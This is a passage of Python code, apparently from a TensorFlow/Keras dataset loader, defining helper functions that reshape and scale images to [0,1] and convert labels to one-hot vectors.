_prepare_label(y_test))) def _prepare_image(x): """Converts images to [n,h,w,c] format in range [0,1].""" return x[..., None].astype('float32') / 255. def _prepare_label(y): """Conerts labels to one-hot encoding.""" return tf.keras.utils.to_categorical(y, NUM_CLASSES)
apache-2.0